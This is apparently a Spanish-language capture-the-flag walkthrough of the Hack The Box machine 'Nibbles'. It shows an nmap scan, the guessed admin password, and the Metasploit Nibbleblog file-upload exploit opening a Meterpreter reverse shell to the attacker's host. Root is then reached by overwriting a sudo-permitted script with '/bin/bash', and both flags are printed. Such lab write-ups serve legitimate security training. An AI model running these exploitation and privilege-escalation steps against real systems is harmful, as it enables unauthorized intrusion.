Hoy vamos a hackear la maquina de HTB llamada Nibbles.
Esta catalogada como facil.
Video
Enumeration
Para empezar hacemos un nmap para ver que puertos tiene abiertos.
sml@m0nikE:~$ nmap -A -p- 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 15:19 CET
Nmap scan report for 10.10.10.75
Host is up (0.039s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol
2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds
Vemos en el codigo fuente de la pagina web que aparece el siguiente
comentario:
/nibbleblog/ directory. Nothing interesting here!
Sabiendo que se tratra del CMS nibbleblog, buscamos algun exploit que pueda
servirnos.
Exploitation
Encontramos un exploit que puede servirnos pero que requiere user/password.
Si buscamos informacion, veremos que el usuario por defecto es admin, el cual
es el que vamos a utilizar, sin embargo la password hemos tenido que
"adivinarla", resultando ser nibbles.
Sabiendo los credenciales, ya podemos utilizar el exploit.
msf5 > search nibble
Matching Modules
================
# Name Disclosure Date Rank
Check Description
- ---- --------------- ----
----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent
Yes Nibbleblog File Upload Vulnerability
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format
type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR
identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing
connections
TARGETURI / yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
targeturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.10.10.75
rhosts => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
[-] Exploit failed: The following options failed to validate: USERNAME,
PASSWORD.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.75:47108) at
2019-11-02 15:30:42 +0100
[+] Deleted image.php
meterpreter > shell
Process 1446 created.
Channel 1 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
user.txt
cd /home
ls
nibbler
cd nibbler
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt
cat user.txt
b02ff32bb332deba49eeaed21152c8d8
Privilege Escalation
En la carpeta de nibbler vemos que hay un fichero .zip llamado personal.
Lo descomprimimos.
Si miramos el codigo vemos que monitor.sh no puede ayudarnos a elevar los
privilegios asi que seguimos buscando alguna pista.
Usamos el comando sudo -l para ver si con nuestro usuario podemos ejecutar
algun comando usando sudo...
$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Vemos que nuestro usuario puede ejecutar como sudo el script monitor.sh que
acabamos
de descomprimir.
Asi que este caso es tan facil como agregar al script una linea para que ejecute
bash y con ello deberia bastar para conseguir una shell con privilegios.
$ ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 10 Nov 2 10:57 monitor.sh
$ echo "/bin/bash" > monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:~/personal/stuff#
root.txt
root@Nibbles:~/personal/stuff# cd /root
root@Nibbles:/root# cat root.txt
b6d745c0dfb6457c55591efc898ef88c
End
Y con esto ya tendriamos el flag del "user" y el flag de "root".
